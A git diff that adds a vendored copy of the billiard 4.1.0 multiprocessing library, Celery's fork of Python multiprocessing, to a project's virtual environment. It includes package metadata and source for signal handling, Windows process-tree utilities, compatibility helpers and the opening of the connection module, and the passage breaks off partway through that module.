+billiard/popen_fork.py,sha256=Kt3n8oEE3J8qb9N28orS7o28Y5bZmBbVe9uU37y-GxQ,2552 +billiard/popen_forkserver.py,sha256=BLLO5B0P9GQj3i2r-16ulKcRMLy3HYNvw8I129ZcNas,1770 +billiard/popen_spawn_posix.py,sha256=cnRYqmztgDv2pURFQl1PzgOzR1ThxuUJeG3ksCy7SCQ,1922 +billiard/popen_spawn_win32.py,sha256=1FH4HYC9ilmkzSEfGqyf6g39qv-zc6cPuM8Z56H51ww,3543 +billiard/process.py,sha256=x1KhWvld6sLNqSEyZPs78CWYtbHPtpyk1t07MXxeLHg,11051 +billiard/queues.py,sha256=b8Ykkvg9B3c5jhXzImcERxCc-bLfDBtFO8u3Y480l08,12739 +billiard/reduction.py,sha256=pVr81gei43nJNhfdSuTDevwmZsiY3LXFTZ-G_uGN5Ts,9382 +billiard/resource_sharer.py,sha256=AKGDzC6ScuX8GdPk9RFEH8MP578_yiJ5Hvy6KTwSIfI,5299 +billiard/semaphore_tracker.py,sha256=72OU2cxJzc3vDamj1oVI5HL8sWRsRfMCWBxQKUP1c2Y,4846 +billiard/sharedctypes.py,sha256=6w59LGEa5PAcufoC4DUUq6TjtyR7cqZz9xmBc9GrLZg,6665 +billiard/spawn.py,sha256=JNdBCCGkQx4wVeTgyiZWMMV-3goL_qJBwtdkkpF5uZ8,11740 +billiard/synchronize.py,sha256=hmQisAgIePaxIpYR2_4D7Nfa9-EurXpeViT5nyKue0I,12962 +billiard/util.py,sha256=oMkyLqonT1IvdmpM_RBUnLDUeK5h5_DeCH9IY7FoGu0,6088 diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/WHEEL b/env/Lib/site-packages/billiard-4.1.0.dist-info/WHEEL new file mode 100644 index 00000000..becc9a66 --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/top_level.txt b/env/Lib/site-packages/billiard-4.1.0.dist-info/top_level.txt new file mode 100644 index 00000000..7ac9b310 --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/top_level.txt @@ -0,0 +1 @@ +billiard diff --git a/env/Lib/site-packages/billiard/__init__.py b/env/Lib/site-packages/billiard/__init__.py new file mode 100644 index 00000000..af216c99 --- /dev/null +++ b/env/Lib/site-packages/billiard/__init__.py @@ -0,0 +1,60 @@ +"""Python multiprocessing fork with improvements and bugfixes""" +# +# Package analogous to 'threading.py' but using processes +# +# multiprocessing/__init__.py +# +# This package is intended to duplicate the functionality (and much of +# the API) of threading.py but uses processes instead of threads. A +# subpackage 'multiprocessing.dummy' has the same API but is a simple +# wrapper for 'threading'. +# +# Try calling `multiprocessing.doc.main()` to read the html +# documentation in a webbrowser. +# +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + + +import sys +from . import context + +VERSION = (4, 1, 0) +__version__ = '.'.join(map(str, VERSION[0:4])) + "".join(VERSION[4:]) +__author__ = 'R Oudkerk / Python Software Foundation' +__author_email__ = 'python-dev@python.org' +__maintainer__ = 'Asif Saif Uddin' +__contact__ = "auvipy@gmail.com" +__homepage__ = "https://github.com/celery/billiard" +__docformat__ = "restructuredtext" + +# -eof meta- + +# +# Copy stuff from default context +# + +globals().update((name, getattr(context._default_context, name)) + for name in context._default_context.__all__) +__all__ = context._default_context.__all__ + +# +# XXX These should not really be documented or public. +# + +SUBDEBUG = 5 +SUBWARNING = 25 + +# +# Alias for main module -- will be reset by bootstrapping child processes +# + +if '__main__' in sys.modules: + sys.modules['__mp_main__'] = sys.modules['__main__'] + + +def ensure_multiprocessing(): + from ._ext import ensure_multiprocessing + return ensure_multiprocessing() diff --git a/env/Lib/site-packages/billiard/_ext.py b/env/Lib/site-packages/billiard/_ext.py new file mode 100644 index 00000000..00a53cda --- /dev/null +++ b/env/Lib/site-packages/billiard/_ext.py @@ -0,0 +1,32 @@ +import sys + +supports_exec = True + +from .compat import _winapi as win32 # noqa + +if sys.platform.startswith("java"): + _billiard = None +else: + try: + import _billiard # noqa + except ImportError: + import _multiprocessing as _billiard # noqa + supports_exec = False + + +def ensure_multiprocessing(): + if _billiard is None: + raise NotImplementedError("multiprocessing not supported") + + +def ensure_SemLock(): + try: + from _billiard import SemLock # noqa + except ImportError: + try: + from _multiprocessing import SemLock # noqa + except ImportError: + raise ImportError("""\ +This platform lacks a functioning sem_open implementation, therefore, +the required synchronization primitives needed will not function, +see issue 3770.""") diff --git a/env/Lib/site-packages/billiard/_win.py b/env/Lib/site-packages/billiard/_win.py new file mode 100644 index 00000000..1dcba646 --- /dev/null +++ b/env/Lib/site-packages/billiard/_win.py @@ -0,0 +1,114 @@ +""" + billiard._win + ~~~~~~~~~~~~~ + + Windows utilities to terminate process groups. + +""" + +import os + +# psutil is painfully slow in win32. So to avoid adding big +# dependencies like pywin32 a ctypes based solution is preferred + +# Code based on the winappdbg project http://winappdbg.sourceforge.net/ +# (BSD License) +from ctypes import ( + byref, sizeof, windll, + Structure, WinError, POINTER, + c_size_t, c_char, c_void_p, +) +from ctypes.wintypes import DWORD, LONG + +ERROR_NO_MORE_FILES = 18 +INVALID_HANDLE_VALUE = c_void_p(-1).value + + +class PROCESSENTRY32(Structure): + _fields_ = [ + ('dwSize', DWORD), + ('cntUsage', DWORD), + ('th32ProcessID', DWORD), + ('th32DefaultHeapID', c_size_t), + ('th32ModuleID', DWORD), + ('cntThreads', DWORD), + ('th32ParentProcessID', DWORD), + ('pcPriClassBase', LONG), + ('dwFlags', DWORD), + ('szExeFile', c_char * 260), + ] +LPPROCESSENTRY32 = POINTER(PROCESSENTRY32) + + +def CreateToolhelp32Snapshot(dwFlags=2, th32ProcessID=0): + hSnapshot = windll.kernel32.CreateToolhelp32Snapshot(dwFlags, + th32ProcessID) + if hSnapshot == INVALID_HANDLE_VALUE: + raise WinError() + return hSnapshot + + +def Process32First(hSnapshot, pe=None): + return _Process32n(windll.kernel32.Process32First, hSnapshot, pe) + + +def Process32Next(hSnapshot, pe=None): + return _Process32n(windll.kernel32.Process32Next, hSnapshot, pe) + + +def _Process32n(fun, hSnapshot, pe=None): + if pe is None: + pe = PROCESSENTRY32() + pe.dwSize = sizeof(PROCESSENTRY32) + success = fun(hSnapshot, byref(pe)) + if not success: + if windll.kernel32.GetLastError() == ERROR_NO_MORE_FILES: + return + raise WinError() + return pe + + +def get_all_processes_pids(): + """Return a dictionary with all processes pids as keys and their + parents as value. Ignore processes with no parents. + """ + h = CreateToolhelp32Snapshot() + parents = {} + pe = Process32First(h) + while pe: + if pe.th32ParentProcessID: + parents[pe.th32ProcessID] = pe.th32ParentProcessID + pe = Process32Next(h, pe) + + return parents + + +def get_processtree_pids(pid, include_parent=True): + """Return a list with all the pids of a process tree""" + parents = get_all_processes_pids() + all_pids = list(parents.keys()) + pids = {pid} + while 1: + pids_new = pids.copy() + + for _pid in all_pids: + if parents[_pid] in pids: + pids_new.add(_pid) + + if pids_new == pids: + break + + pids = pids_new.copy() + + if not include_parent: + pids.remove(pid) + + return list(pids) + + +def kill_processtree(pid, signum): + """Kill a process and all its descendants""" + family_pids = get_processtree_pids(pid) + + for _pid in family_pids: + os.kill(_pid, signum) diff --git a/env/Lib/site-packages/billiard/common.py b/env/Lib/site-packages/billiard/common.py new file mode 100644 index 00000000..9324d3bc --- /dev/null +++ b/env/Lib/site-packages/billiard/common.py @@ -0,0 +1,157 @@ +""" +This module contains utilities added by billiard, to keep +"non-core" functionality out of ``.util``.""" + +import os +import signal +import sys + +import pickle + +from .exceptions import RestartFreqExceeded +from time import monotonic + +pickle_load = pickle.load +pickle_loads = pickle.loads + +# cPickle.loads does not support buffer() objects, +# but we can just create a StringIO and use load. +from io import BytesIO + + +SIGMAP = dict( + (getattr(signal, n), n) for n in dir(signal) if n.startswith('SIG') +) +for _alias_sig in ('SIGHUP', 'SIGABRT'): + try: + # Alias for deprecated signal overwrites the name we want + SIGMAP[getattr(signal, _alias_sig)] = _alias_sig + except AttributeError: + pass + + +TERM_SIGNAL, TERM_SIGNAME = signal.SIGTERM, 'SIGTERM' +REMAP_SIGTERM = os.environ.get('REMAP_SIGTERM') +if REMAP_SIGTERM: + TERM_SIGNAL, TERM_SIGNAME = ( + getattr(signal, REMAP_SIGTERM), REMAP_SIGTERM) + + +TERMSIGS_IGNORE = {'SIGTERM'} if REMAP_SIGTERM else set() +TERMSIGS_FORCE = {'SIGQUIT'} if REMAP_SIGTERM else set() + +EX_SOFTWARE = 70 + +TERMSIGS_DEFAULT = { + 'SIGHUP', + 'SIGQUIT', + TERM_SIGNAME, + 'SIGUSR1', + 'SIGUSR2' +} + +TERMSIGS_FULL = { + 'SIGHUP', + 'SIGQUIT', + 'SIGTRAP', + 'SIGABRT', + 'SIGEMT', + 'SIGSYS', + 'SIGPIPE', + 'SIGALRM', + TERM_SIGNAME, + 'SIGXCPU', + 'SIGXFSZ', + 'SIGVTALRM', + 'SIGPROF', + 'SIGUSR1', + 'SIGUSR2', +} + +#: set by signal handlers just before calling exit. +#: if this is true after the sighandler returns it means that something +#: went wrong while terminating the process, and :func:`os._exit` +#: must be called ASAP. +_should_have_exited = [False] + + +def human_status(status): + if (status or 0) < 0: + try: + return 'signal {0} ({1})'.format(-status, SIGMAP[-status]) + except KeyError: + return 'signal {0}'.format(-status) + return 'exitcode {0}'.format(status) + + +def pickle_loads(s, load=pickle_load): + # used to support buffer objects + return load(BytesIO(s)) + + +def maybe_setsignal(signum, handler): + try: + signal.signal(signum, handler) + except (OSError, AttributeError, ValueError, RuntimeError): + pass + + +def _shutdown_cleanup(signum, frame): + # we will exit here so if the signal is received a second time + # we can be sure that something is very wrong and we may be in + # a crashing loop. + if _should_have_exited[0]: + os._exit(EX_SOFTWARE) + maybe_setsignal(signum, signal.SIG_DFL) + _should_have_exited[0] = True + sys.exit(-(256 - signum)) + + +def signum(sig): + return getattr(signal, sig, None) + + +def _should_override_term_signal(sig, current): + return ( + sig in TERMSIGS_FORCE or + (current is not None and current != signal.SIG_IGN) + ) + + +def reset_signals(handler=_shutdown_cleanup, full=False): + for sig in TERMSIGS_FULL if full else TERMSIGS_DEFAULT: + num = signum(sig) + if num: + if _should_override_term_signal(sig, signal.getsignal(num)): + maybe_setsignal(num, handler) + for sig in TERMSIGS_IGNORE: + num = signum(sig) + if num: + maybe_setsignal(num, signal.SIG_IGN) + + +class restart_state: + RestartFreqExceeded = RestartFreqExceeded + + def __init__(self, maxR, maxT): + self.maxR, self.maxT = maxR, maxT + self.R, self.T = 0, None + + def step(self, now=None): + now = monotonic() if now is None else now + R = self.R + if self.T and now - self.T >= self.maxT: + # maxT passed, reset counter and time passed. + self.T, self.R = now, 0 + elif self.maxR and self.R >= self.maxR: + # verify that R has a value as the result handler + # resets this when a job is accepted. If a job is accepted + # the startup probably went fine (startup restart burst + # protection) + if self.R: # pragma: no cover + self.R = 0 # reset in case someone catches the error + raise self.RestartFreqExceeded("%r in %rs" % (R, self.maxT)) + # first run sets T + if self.T is None: + self.T = now + self.R += 1 diff --git a/env/Lib/site-packages/billiard/compat.py b/env/Lib/site-packages/billiard/compat.py new file mode 100644 index 00000000..bea97467 --- /dev/null +++ b/env/Lib/site-packages/billiard/compat.py @@ -0,0 +1,279 @@ +import errno +import numbers +import os +import subprocess +import sys + +from itertools import zip_longest + +if sys.platform == 'win32': + try: + import _winapi # noqa + except ImportError: # pragma: no cover + from _multiprocessing import win32 as _winapi # noqa +else: + _winapi = None # noqa + +try: + import resource +except ImportError: # pragma: no cover + resource = None + +from io import UnsupportedOperation +FILENO_ERRORS = (AttributeError, ValueError, UnsupportedOperation) + + +if hasattr(os, 'write'): + __write__ = os.write + + def send_offset(fd, buf, offset): + return __write__(fd, buf[offset:]) + +else: # non-posix platform + + def send_offset(fd, buf, offset): # noqa + raise NotImplementedError('send_offset') + + +try: + fsencode = os.fsencode + fsdecode = os.fsdecode +except AttributeError: + def _fscodec(): + encoding = sys.getfilesystemencoding() + if encoding == 'mbcs': + errors = 'strict' + else: + errors = 'surrogateescape' + + def fsencode(filename): + """ + Encode filename to the filesystem encoding with 'surrogateescape' + error handler, return bytes unchanged. On Windows, use 'strict' + error handler if the file system encoding is 'mbcs' (which is the + default encoding). + """ + if isinstance(filename, bytes): + return filename + elif isinstance(filename, str): + return filename.encode(encoding, errors) + else: + raise TypeError("expect bytes or str, not %s" + % type(filename).__name__) + + def fsdecode(filename): + """ + Decode filename from the filesystem encoding with 'surrogateescape' + error handler, return str unchanged. On Windows, use 'strict' error + handler if the file system encoding is 'mbcs' (which is the default + encoding). + """ + if isinstance(filename, str): + return filename + elif isinstance(filename, bytes): + return filename.decode(encoding, errors) + else: + raise TypeError("expect bytes or str, not %s" + % type(filename).__name__) + + return fsencode, fsdecode + + fsencode, fsdecode = _fscodec() + del _fscodec + + +def maybe_fileno(f): + """Get object fileno, or :const:`None` if not defined.""" + if isinstance(f, numbers.Integral): + return f + try: + return f.fileno() + except FILENO_ERRORS: + pass + + +def get_fdmax(default=None): + """Return the maximum number of open file descriptors + on this system. + + :keyword default: Value returned if there's no file + descriptor limit. + + """ + try: + return os.sysconf('SC_OPEN_MAX') + except: + pass + if resource is None: # Windows + return default + fdmax = resource.getrlimit(resource.RLIMIT_NOFILE)[1] + if fdmax == resource.RLIM_INFINITY: + return default + return fdmax + + +def uniq(it): + """Return all unique elements in ``it``, preserving order.""" + seen = set() + return (seen.add(obj) or obj for obj in it if obj not in seen) + + +try: + closerange = os.closerange +except AttributeError: + + def closerange(fd_low, fd_high): # noqa + for fd in reversed(range(fd_low, fd_high)): + try: + os.close(fd) + except OSError as exc: + if exc.errno != errno.EBADF: + raise + + def close_open_fds(keep=None): + # must make sure this is 0-inclusive (Issue #celery/1882) + keep = list(uniq(sorted( + f for f in map(maybe_fileno, keep or []) if f is not None + ))) + maxfd = get_fdmax(default=2048) + kL, kH = iter([-1] + keep), iter(keep + [maxfd]) + for low, high in zip_longest(kL, kH): + if low + 1 != high: + closerange(low + 1, high) +else: + def close_open_fds(keep=None): # noqa + keep = [maybe_fileno(f) + for f in (keep or []) if maybe_fileno(f) is not None] + for fd in reversed(range(get_fdmax(default=2048))): + if fd not in keep: + try: + os.close(fd) + except OSError as exc: + if exc.errno != errno.EBADF: + raise + + +def get_errno(exc): + """:exc:`socket.error` and :exc:`IOError` first got + the ``.errno`` attribute in Py2.7""" + try: + return exc.errno + except AttributeError: + return 0 + + +try: + import _posixsubprocess +except ImportError: + def spawnv_passfds(path, args, passfds): + if sys.platform != 'win32': + # when not using _posixsubprocess (on earlier python) and not on + # windows, we want to keep stdout/stderr open... + passfds = passfds + [ + maybe_fileno(sys.stdout), + maybe_fileno(sys.stderr), + ] + pid = os.fork() + if not pid: + close_open_fds(keep=sorted(f for f in passfds if f)) + os.execv(fsencode(path), args) + return pid +else: + def spawnv_passfds(path, args, passfds): + passfds = sorted(passfds) + errpipe_read, errpipe_write = os.pipe() + try: + args = [ + args, [fsencode(path)], True, tuple(passfds), None, None, + -1, -1, -1, -1, -1, -1, errpipe_read, errpipe_write, + False, False] + if sys.version_info >= (3, 11): + args.append(-1) # process_group + if sys.version_info >= (3, 9): + args.extend((None, None, None, -1)) # group, extra_groups, user, umask + args.append(None) # preexec_fn + if sys.version_info >= (3, 11): + args.append(subprocess._USE_VFORK) + return _posixsubprocess.fork_exec(*args) + finally: + os.close(errpipe_read) + os.close(errpipe_write) + + +if sys.platform == 'win32': + + def setblocking(handle, blocking): + raise NotImplementedError('setblocking not implemented on win32') + + def isblocking(handle): + raise NotImplementedError('isblocking not implemented on win32') + +else: + from os import O_NONBLOCK + from fcntl import fcntl, F_GETFL, F_SETFL + + def isblocking(handle): # noqa + return not (fcntl(handle, F_GETFL) & O_NONBLOCK) + + def setblocking(handle, blocking): # noqa + flags = fcntl(handle, F_GETFL, 0) + fcntl( + handle, F_SETFL, + flags & (~O_NONBLOCK) if blocking else flags | O_NONBLOCK, + ) + + +E_PSUTIL_MISSING = """ +On Windows, the ability to inspect memory usage requires the psutil library. + +You can install it using pip: + + $ pip install psutil +""" + + +E_RESOURCE_MISSING = """ +Your platform ({0}) does not seem to have the `resource.getrusage' function. + +Please open an issue so that we can add support for this platform. +""" + + +if sys.platform == 'win32': + + try: + import psutil + except ImportError: # pragma: no cover + psutil = None # noqa + + def mem_rss(): + # type () -> int + if psutil is None: + raise ImportError(E_PSUTIL_MISSING.strip()) + return int(psutil.Process(os.getpid()).memory_info()[0] / 1024.0) + +else: + try: + from resource import getrusage, RUSAGE_SELF + except ImportError: # pragma: no cover + getrusage = RUSAGE_SELF = None # noqa + + if 'bsd' in sys.platform or sys.platform == 'darwin': + # On BSD platforms :man:`getrusage(2)` ru_maxrss field is in bytes. + + def maxrss_to_kb(v): + # type: (SupportsInt) -> int + return int(v) / 1024.0 + + else: + # On Linux it's kilobytes. + + def maxrss_to_kb(v): + # type: (SupportsInt) -> int + return int(v) + + def mem_rss(): + # type () -> int + if resource is None: + raise ImportError(E_RESOURCE_MISSING.strip().format(sys.platform)) + return maxrss_to_kb(getrusage(RUSAGE_SELF).ru_maxrss) diff --git a/env/Lib/site-packages/billiard/connection.py b/env/Lib/site-packages/billiard/connection.py new file mode 100644 index 00000000..70b80590 --- /dev/null +++ b/env/Lib/site-packages/billiard/connection.py @@ -0,0 +1,1034 @@ +# +# A higher level module for using sockets (or Windows named pipes) +# +# multiprocessing/connection.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import errno +import io +import os +import sys +import socket +import select +import struct +import tempfile +import itertools + +from . import reduction +from . import util + +from . import AuthenticationError, BufferTooShort +from ._ext import _billiard +from .compat import setblocking, send_offset +from time import monotonic +from .reduction import ForkingPickler + +try: + from .compat import _winapi +except ImportError: + if sys.platform == 'win32': + raise + _winapi = None +else: + if sys.platform == 'win32': + WAIT_OBJECT_0 = _winapi.WAIT_OBJECT_0 + WAIT_ABANDONED_0 = _winapi.WAIT_ABANDONED_0 + + WAIT_TIMEOUT = _winapi.WAIT_TIMEOUT + INFINITE = _winapi.INFINITE + +__all__ = ['Client', 'Listener', 'Pipe', 'wait'] + +is_pypy = hasattr(sys, 'pypy_version_info') + +# +# +# + +BUFSIZE = 8192 +# A very generous timeout when it comes to local connections... +CONNECTION_TIMEOUT = 20. + +_mmap_counter = itertools.count() + +default_family = 'AF_INET' +families = ['AF_INET'] + +if hasattr(socket, 'AF_UNIX'): + default_family = 'AF_UNIX' + families += ['AF_UNIX'] + +if sys.platform == 'win32': + default_family = 'AF_PIPE' + families += ['AF_PIPE'] + + +def _init_timeout(timeout=CONNECTION_TIMEOUT): + return monotonic() + timeout + + +def _check_timeout(t): + return monotonic() > t + +# +# +# + + +def arbitrary_address(family): + ''' + Return an arbitrary free address for the given family + ''' + if family == 'AF_INET': + return ('localhost', 0) + elif family == 'AF_UNIX': + return tempfile.mktemp(prefix='listener-', dir=util.get_temp_dir()) + elif family == 'AF_PIPE': + return tempfile.mktemp(prefix=r'\\.\pipe\pyc-%d-%d-' % + (os.getpid(), next(_mmap_counter)), dir="") + else: + raise ValueError('unrecognized family') + + +def _validate_family(family): + ''' + Checks if the family is valid for the current environment. + ''' + if sys.platform != 'win32' and family == 'AF_PIPE': + raise ValueError('Family %s is not recognized.' % family) + + if sys.platform == 'win32' and family == 'AF_UNIX': + # double check + if not hasattr(socket, family): + raise ValueError('Family %s is not recognized.' % family) + + +def address_type(address): + ''' + Return the types of the address + + This can be 'AF_INET', 'AF_UNIX', or 'AF_PIPE' + ''' + if type(address) == tuple: + return 'AF_INET' + elif type(address) is str and address.startswith('\\\\'): + return 'AF_PIPE' + elif type(address) is str: + return 'AF_UNIX' + else: + raise ValueError('address type of %r unrecognized' % address) + +# +# Connection classes +# + + +class _SocketContainer: + + def __init__(self, sock): + self.sock = sock + + +class _ConnectionBase: + _handle = None + + def __init__(self, handle, readable=True, writable=True): + if isinstance(handle, _SocketContainer): + self._socket = handle.sock # keep ref so not collected + handle = handle.sock.fileno() + handle = handle.__index__() + if handle < 0: + raise ValueError("invalid handle") + if not readable and not writable: + raise ValueError( + "at least one of `readable` and `writable` must be True") + self._handle = handle + self._readable = readable + self._writable = writable + + # XXX should we use util.Finalize instead of a __del__? + + def __del__(self): + if self._handle is not None: + self._close() + + def _check_closed(self): + if self._handle is None: + raise OSError("handle is closed") + + def _check_readable(self): + if not self._readable: + raise OSError("connection is write-only") + + def _check_writable(self): + if not self._writable: + raise OSError("connection is read-only") + + def _bad_message_length(self): + if self._writable: + self._readable = False + else: + self.close() + raise OSError("bad message length") + + @property + def closed(self): + """True if the connection is closed""" + return self._handle is None + + @property + def readable(self): + """True if the connection is readable""" + return self._readable + + @property + def writable(self): + """True if the connection is writable""" + return self._writable + + def fileno(self): + """File descriptor or handle of the connection""" + self._check_closed() + return self._handle + + def close(self): + """Close the connection""" + if self._handle is not None: + try: + self._close() + finally: + self._handle = None + + def send_bytes(self, buf, offset=0, size=None): + """Send the bytes data from a bytes-like object""" + self._check_closed() + self._check_writable() + m = memoryview(buf) + # HACK for byte-indexing of non-bytewise buffers (e.g. array.array) + if m.itemsize > 1: + m = memoryview(bytes(m)) + n = len(m) + if offset < 0: + raise ValueError("offset is negative") + if n < offset: + raise ValueError("buffer length < offset") + if size is None: + size = n - offset + elif size < 0: + raise ValueError("size is negative") + elif offset + size > n: + raise ValueError("buffer length < offset + size") + self._send_bytes(m[offset:offset + size]) + + def send(self, obj): + """Send a (picklable) object""" + self._check_closed() + self._check_writable() + self._send_bytes(ForkingPickler.dumps(obj)) + + def recv_bytes(self, maxlength=None): + """ + Receive bytes data as a bytes object. + """ + self._check_closed() + self._check_readable() + if maxlength is not None and maxlength < 0: + raise ValueError("negative maxlength") + buf = self._recv_bytes(maxlength) + if buf is None: + self._bad_message_length() + return buf.getvalue() + + def recv_bytes_into(self, buf, offset=0): + """ + Receive bytes data into a writeable bytes-like object. + Return the number of bytes read. + """ + self._check_closed() + self._check_readable() + with memoryview(buf) as m: + # Get bytesize of arbitrary buffer + itemsize = m.itemsize + bytesize = itemsize * len(m) + if offset < 0: + raise ValueError("negative offset") + elif offset > bytesize: + raise ValueError("offset too large") + result = self._recv_bytes() + size = result.tell() + if bytesize < offset + size: + raise BufferTooShort(result.getvalue()) + # Message can fit in dest + result.seek(0) + result.readinto(m[ + offset // itemsize:(offset + size) // itemsize + ]) + return size + + def recv(self): + """Receive a (picklable) object""" + self._check_closed() + self._check_readable() + buf = self._recv_bytes() + return ForkingPickler.loadbuf(buf) + + def poll(self, timeout=0.0): + """Whether there is any input available to be read""" + self._check_closed() + self._check_readable() + return self._poll(timeout) + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc_value, exc_tb): + self.close() + + def send_offset(self, buf, offset): + return send_offset(self.fileno(), buf, offset) + + def setblocking(self, blocking): + setblocking(self.fileno(), blocking) + + +if _winapi: + + class PipeConnection(_ConnectionBase): + """ + Connection class based on a Windows named pipe. + Overlapped I/O is used, so the handles must have been created + with FILE_FLAG_OVERLAPPED. + """ + _got_empty_message = False + + def _close(self, _CloseHandle=_winapi.CloseHandle): + _CloseHandle(self._handle) + + def _send_bytes(self, buf): + ov, err = _winapi.WriteFile(self._handle, buf, overlapped=True) + try: + if err == _winapi.ERROR_IO_PENDING: + waitres = _winapi.WaitForMultipleObjects( + + [ov.event], False, INFINITE) + assert waitres == WAIT_OBJECT_0 + except: + ov.cancel() + raise + finally: + nwritten, err = ov.GetOverlappedResult(True) + assert err == 0 + assert nwritten == len(buf) + + def _recv_bytes(self, maxsize=None): + if self._got_empty_message: + self._got_empty_message = False + return io.BytesIO() + else: + bsize = 128 if maxsize is None else min(maxsize, 128) + try: + ov, err = _winapi.ReadFile( + self._handle, bsize, overlapped=True, + ) + try: + if err == _winapi.ERROR_IO_PENDING: + waitres = _winapi.WaitForMultipleObjects( + [ov.event], False, INFINITE) + assert waitres == WAIT_OBJECT_0 + except: + ov.cancel() + raise + finally: + nread, err = ov.GetOverlappedResult(True) + if err == 0: + f = io.BytesIO() + f.write(ov.getbuffer()) + return f + elif err == _winapi.ERROR_MORE_DATA: + return self._get_more_data(ov, maxsize) + except OSError as e: + if e.winerror == _winapi.ERROR_BROKEN_PIPE: + raise EOFError + else: + raise + raise RuntimeError( + "shouldn't get here; expected KeyboardInterrupt") + + def _poll(self, timeout): + if (self._got_empty_message or + _winapi.PeekNamedPipe(self._handle)[0] != 0): + return True + return bool(wait([self], timeout)) + + def _get_more_data(self, ov, maxsize): + buf = ov.getbuffer() + f = io.BytesIO() + f.write(buf) + left = _winapi.PeekNamedPipe(self._handle)[1] + assert left > 0 + if maxsize is not None and len(buf) + left > maxsize: + self._bad_message_length() + ov, err = _winapi.ReadFile(self._handle, left, overlapped=True) + rbytes, err = ov.GetOverlappedResult(True) + assert err == 0 + assert rbytes == left + f.write(ov.getbuffer()) + return f + + +class Connection(_ConnectionBase): + """ + Connection class based on an arbitrary file descriptor (Unix only), or + a socket handle (Windows). + """ + + if _winapi: + def _close(self, _close=_billiard.closesocket): + _close(self._handle) + _write = _billiard.send + _read = _billiard.recv + else: + def _close(self, _close=os.close): + _close(self._handle) + _write = os.write + _read = os.read + + def _send(self, buf, write=_write): + remaining = len(buf) + while True: + try: + n = write(self._handle, buf) + except (OSError, IOError, socket.error) as exc: + if getattr(exc, 'errno', None) != errno.EINTR: + raise + else: + remaining -= n + if remaining == 0: + break + buf = buf[n:] + + def _recv(self, size, read=_read): + buf = io.BytesIO() + handle = self._handle + remaining = size + while remaining > 0: + try: + chunk = read(handle, remaining) + except (OSError, IOError, socket.error) as exc: + if getattr(exc, 'errno', None) != errno.EINTR: + raise + else: + n = len(chunk) + if n == 0: + if remaining == size: + raise EOFError + else: + raise OSError("got end of file during message") + buf.write(chunk) + remaining -= n + return buf + + def _send_bytes(self, buf, memoryview=memoryview): + n = len(buf) + # For wire compatibility with 3.2 and lower + header = struct.pack("!i", n) + if n > 16384: + # The payload is large so Nagle's algorithm won't be triggered + # and we'd better avoid the cost of concatenation. + self._send(header) + self._send(buf) + else: + # Issue #20540: concatenate before sending, to avoid delays due + # to Nagle's algorithm on a TCP socket. + # Also note we want to avoid sending a 0-length buffer separately, + # to avoid "broken pipe" errors if the other end closed the pipe. + if isinstance(buf, memoryview): + buf = buf.tobytes() + self._send(header + buf) + + def _recv_bytes(self, maxsize=None): + buf = self._recv(4) + size, = struct.unpack("!i", buf.getvalue()) + if maxsize is not None and size > maxsize: + return None + return self._recv(size) + + def _poll(self, timeout): + r = wait([self], timeout) + return bool(r) + + +# +# Public functions +# + +class Listener: + ''' + Returns a listener object. + + This is a wrapper for a bound socket which is 'listening' for + connections, or for a Windows named pipe. + ''' + def __init__(self, address=None, family=None, backlog=1, authkey=None): + family = (family or + (address and address_type(address)) or default_family) + address = address or arbitrary_address(family) + + _validate_family(family) + if family == 'AF_PIPE': + self._listener = PipeListener(address, backlog) + else: + self._listener = SocketListener(address, family, backlog) + + if authkey is not None and not isinstance(authkey, bytes): + raise TypeError('authkey should be a byte string') + + self._authkey = authkey + + def accept(self): + ''' + Accept a connection on the bound socket or named pipe of `self`. + + Returns a `Connection` object. + ''' + if self._listener is None: + raise OSError('listener is closed') + c = self._listener.accept() + if self._authkey: + deliver_challenge(c, self._authkey) + answer_challenge(c, self._authkey) + return c + + def close(self): + ''' + Close the bound socket or named pipe of `self`. + ''' + listener = self._listener + if listener is not None: + self._listener = None + listener.close() + + address = property(lambda self: self._listener._address) + last_accepted = property(lambda self: self._listener._last_accepted) + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc_value, exc_tb): + self.close() + + +def Client(address, family=None, authkey=None): + ''' + Returns a connection to the address of a `Listener` + ''' + family = family or address_type(address) + _validate_family(family) + if family == 'AF_PIPE': + c = PipeClient(address) + else: + c = SocketClient(address) + + if authkey is not None and not isinstance(authkey, bytes): + raise TypeError('authkey should be a byte string') + + if authkey is not None: + answer_challenge(c, authkey) + deliver_challenge(c, authkey) + + return c + + +def detach(sock): + if hasattr(sock, 'detach'): + return sock.detach() + # older socket lib does not have detach. We'll keep a reference around + # so that it does not get garbage collected. + return _SocketContainer(sock) + + +if sys.platform != 'win32': + + def Pipe(duplex=True, rnonblock=False, wnonblock=False): + ''' + Returns pair of connection objects at either end of a pipe + ''' + if duplex: + s1, s2 = socket.socketpair() + s1.setblocking(not rnonblock) + s2.setblocking(not wnonblock) + c1 = Connection(detach(s1)) + c2 = Connection(detach(s2)) + else: + fd1, fd2 = os.pipe() + if rnonblock: + setblocking(fd1, 0) + if wnonblock: + setblocking(fd2, 0) + c1 = Connection(fd1, writable=False) + c2 = Connection(fd2, readable=False) + + return c1, c2 + +else: + + def Pipe(duplex=True, rnonblock=False, wnonblock=False): + ''' + Returns pair of connection objects at either end of a pipe + ''' + assert not rnonblock, 'rnonblock not supported on windows' + assert not wnonblock, 'wnonblock not supported on windows' + address = arbitrary_address('AF_PIPE') + if duplex: + openmode = _winapi.PIPE_ACCESS_DUPLEX + access = _winapi.GENERIC_READ | _winapi.GENERIC_WRITE + obsize, ibsize = BUFSIZE, BUFSIZE + else: + openmode = _winapi.PIPE_ACCESS_INBOUND + access = _winapi.GENERIC_WRITE + obsize, ibsize = 0, BUFSIZE + + h1 = _winapi.CreateNamedPipe( + address, openmode | _winapi.FILE_FLAG_OVERLAPPED | + _winapi.FILE_FLAG_FIRST_PIPE_INSTANCE, + _winapi.PIPE_TYPE_MESSAGE | _winapi.PIPE_READMODE_MESSAGE | + _winapi.PIPE_WAIT, + 